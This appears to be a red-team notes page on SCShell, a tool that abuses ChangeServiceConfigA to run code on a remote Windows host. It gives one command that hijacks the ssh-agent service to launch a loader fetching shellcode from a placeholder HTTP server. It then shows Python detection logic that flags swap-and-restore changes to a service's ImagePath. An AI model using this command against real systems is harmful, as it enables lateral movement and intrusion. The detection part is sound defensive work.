SCShell
SCShell can be used as a stealthier alternative to PsExec for remote code execution. It uses the ChangeServiceConfigA API to temporarily modify an existing service's configuration, execute the specified payload, and then restore the original service settings. Because it creates no new service and does not rely on network shares or SMB, it offers better operational security than PsExec.
# Modify the service's path to achieve RCE
scshell -t 80 dcorp-adminsrv ssh-agent 'c:\windows\system32\cmd.exe /c start /b c:\windows\temp\binloader.exe <http-server-IP> <port> dcorp-adminsrv_tcp.bin'
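From the defender's side, the technique above leaves a distinctive trace: the service's ImagePath value is rewritten to an unusual binary and then set back to its original value a few seconds later. The following detection logic is an added example, not part of SCShell or the original page; it assumes Sysmon-style registry "value set" records (Event ID 13) from which the service name, new ImagePath and timestamp have already been extracted, and the records it runs over are constructed sample data.

```python
# Added example: detect the modify -> execute -> restore pattern that rewriting an
# existing service's ImagePath via ChangeServiceConfig produces. Input records are
# assumed to be pre-parsed Sysmon Event ID 13 (registry value set) entries for
# HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath; the sample below is constructed.
import re
from dataclasses import dataclass

@dataclass
class ImagePathChange:
    ts: float          # event time, seconds since epoch
    service: str       # service name taken from the registry key path
    new_path: str      # ImagePath value after the change

# Values a legitimate service binary rarely points at: a shell/interpreter or a temp dir.
SUSPICIOUS = re.compile(r"(\\cmd\.exe|\\powershell\.exe|\\temp\\|\\users\\public\\)", re.IGNORECASE)

def find_swap_and_restore(events, window_seconds=300):
    """Return (service, injected_path, original_path) for every service whose ImagePath
    was set to a suspicious value and then restored to its previous value within
    window_seconds. A baseline (pre-change) value must have been observed."""
    findings = []
    last_path = {}   # service -> most recently observed ImagePath
    pending = {}     # service -> (ts of swap, original path, injected path)
    for ev in sorted(events, key=lambda e: e.ts):
        prev = last_path.get(ev.service)
        if ev.service in pending:
            start, original, injected = pending[ev.service]
            if ev.new_path == original and ev.ts - start <= window_seconds:
                findings.append((ev.service, injected, original))
                del pending[ev.service]
            elif ev.ts - start > window_seconds:
                del pending[ev.service]   # too slow for a swap-and-restore; drop it
        elif prev is not None and SUSPICIOUS.search(ev.new_path) and not SUSPICIOUS.search(prev):
            pending[ev.service] = (ev.ts, prev, ev.new_path)
        last_path[ev.service] = ev.new_path
    return findings

# Constructed sample: a baseline value, the swap, the restore 2.5 s later, and an unrelated service.
SAMPLE = [
    ImagePathChange(1000.0, "ssh-agent", r"C:\Windows\System32\OpenSSH\ssh-agent.exe"),
    ImagePathChange(1020.0, "ssh-agent", r"c:\windows\system32\cmd.exe /c start /b c:\windows\temp\loader.exe"),
    ImagePathChange(1022.5, "ssh-agent", r"C:\Windows\System32\OpenSSH\ssh-agent.exe"),
    ImagePathChange(1100.0, "Spooler", r"C:\Windows\System32\spoolsv.exe"),
]

if __name__ == "__main__":
    for service, injected, original in find_swap_and_restore(SAMPLE):
        print(f"[ALERT] {service}: ImagePath swapped to {injected!r} and restored to {original!r}")
```

A swap that is never restored is not reported by this function, so pair it with a plain alert on any suspicious ImagePath value to cover the case where the payload crashes the service before cleanup.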